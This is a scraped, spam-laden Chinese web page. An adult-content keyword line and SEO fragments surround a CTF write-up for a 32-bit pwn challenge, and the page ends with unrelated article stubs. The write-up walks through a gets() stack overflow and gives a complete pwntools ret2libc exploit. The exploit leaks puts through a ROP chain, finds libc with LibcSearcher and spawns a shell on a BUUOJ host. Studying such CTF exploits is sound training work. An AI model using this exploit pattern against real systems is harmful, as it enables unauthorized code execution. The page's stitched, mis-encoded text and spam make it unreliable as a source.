97色伦色在线综合视频,无玛专区,18videosex性欧美黑色,日韩黄色电影免费在线观看,国产精品伦理一区二区三区,在线视频欧美日韩,亚洲欧美在线中文字幕不卡

建網(wǎng)站首頁(yè)圖片哪里找百度助手手機(jī)下載

鶴壁市浩天電氣有限公司 2026/01/24 15:50:33
建網(wǎng)站首頁(yè)圖片哪里找,百度助手手機(jī)下載,公司變更登記申請(qǐng)書,免費(fèi)微信商城系統(tǒng)首先checksec檢查保護(hù)機(jī)制#xff1a;-32位程序-開啟了棧不可執(zhí)行機(jī)制然后使用反匯編工具IDA進(jìn)行分析#xff1a;看到了vuln函數(shù)和左邊的win1#xff0c;win2函數(shù)及flag函數(shù)#xff0c;第一眼看到就覺得能夠從這些函數(shù)中獲取flag#xff0c;但實(shí)際行不行呢#xff0c;先一…首先checksec檢查保護(hù)機(jī)制-32位程序-開啟了棧不可執(zhí)行機(jī)制然后使用反匯編工具IDA進(jìn)行分析看到了vuln函數(shù)和左邊的win1win2函數(shù)及flag函數(shù)第一眼看到就覺得能夠從這些函數(shù)中獲取flag但實(shí)際行不行呢先一個(gè)一個(gè)點(diǎn)進(jìn)去看一下vuln函數(shù)內(nèi)部gets函數(shù)可觸發(fā)棧溢出漏洞順便算出偏移為0x18 0x8win1函數(shù)內(nèi)部;使變量win1的值為1win2函數(shù)內(nèi)部一些if-else的條件選擇語(yǔ)句最后是flag函數(shù)內(nèi)部可以發(fā)現(xiàn)要想從這里拿到flag必須要讓win1win2和a1的值都等于-559039827但是前面的那幾個(gè)函數(shù)都無(wú)法實(shí)現(xiàn)所以這幾個(gè)函數(shù)一點(diǎn)作用也沒有純糊弄人呢由于在程序的反匯編代碼中沒有任何后門函數(shù)和system函數(shù)地址題目也沒給libc庫(kù)文件這里考慮泄露出某個(gè)函數(shù)的真實(shí)的地址再借助LibcSearcher這個(gè)插件找到libc庫(kù)再計(jì)算出libc基址進(jìn)而計(jì)算出system函數(shù)及/bin/sh的地址先在IDA中拿到vuln函數(shù)的地址方便后面二次使用棧溢出漏洞0x8048714然后就可以開始編寫exp攻擊腳本了第一次棧溢出先構(gòu)造ROP鏈執(zhí)行puts函數(shù)打印出puts函數(shù)的真實(shí)地址拿到后通過LibcSearcher找到libc庫(kù)然后計(jì)算出libc基址后再計(jì)算出system函數(shù)和/bin/sh地址第二次棧溢出執(zhí)行system函數(shù)后就能拿到shellfrom pwn import * from LibcSearcher import LibcSearcher context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地運(yùn)行程序。 # gdb.attach(io) # 啟動(dòng) GDB io connect(node5.buuoj.cn,29484) # 與在線環(huán)境交互。 offset 0x18 0x4 vuln_addr 0x8048714 elf ELF(./pwn) puts_got elf.got[puts] puts_plt elf.plt[puts] io.recvuntil(bEnter your input ) payload ba*offset p32(puts_plt) p32(vuln_addr) p32(puts_got) io.sendline(payload) puts_addr u32(io.recv(4)) print(hex(puts_addr)) libc LibcSearcher(puts,puts_addr) libc_base puts_addr - libc.dump(puts) system_addr libc_base libc.dump(system) bin_sh_addr libc_base libc.dump(str_bin_sh) io.recvuntil(bEnter your input ) payload ba*offset p32(system_addr) p32(1) p32(bin_sh_addr) io.sendline(payload) io.interactive()這是運(yùn)行結(jié)果這里要手動(dòng)選擇libc庫(kù)32位程序就選擇32位的libc庫(kù)就行可能會(huì)選到不適配得到libc庫(kù)多試幾個(gè)就行了
版權(quán)聲明: 本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)聯(lián)系我們進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

網(wǎng)站改版計(jì)劃wordpress 優(yōu)惠卷

網(wǎng)站改版計(jì)劃,wordpress 優(yōu)惠卷,深圳網(wǎng)站系統(tǒng)哪家強(qiáng),html網(wǎng)站設(shè)計(jì)源碼Hello#xff0c;Old 鐵。今天給大家分享一個(gè)#xff0c;可能是全網(wǎng)最簡(jiǎn)潔、最好用的將本地視頻轉(zhuǎn)化為爆款文章

2026/01/21 15:58:01

做網(wǎng)站新聞編輯網(wǎng)站整合discuz

做網(wǎng)站新聞編輯,網(wǎng)站整合discuz,網(wǎng)站網(wǎng)絡(luò)營(yíng)銷公司,網(wǎng)站開發(fā) 確認(rèn)函安裝包降級(jí)回滾操作#xff1a;Miniconda-Python3.10應(yīng)對(duì)突發(fā)兼容問題 在AI模型訓(xùn)練的深夜#xff0c;你正

2026/01/23 02:47:01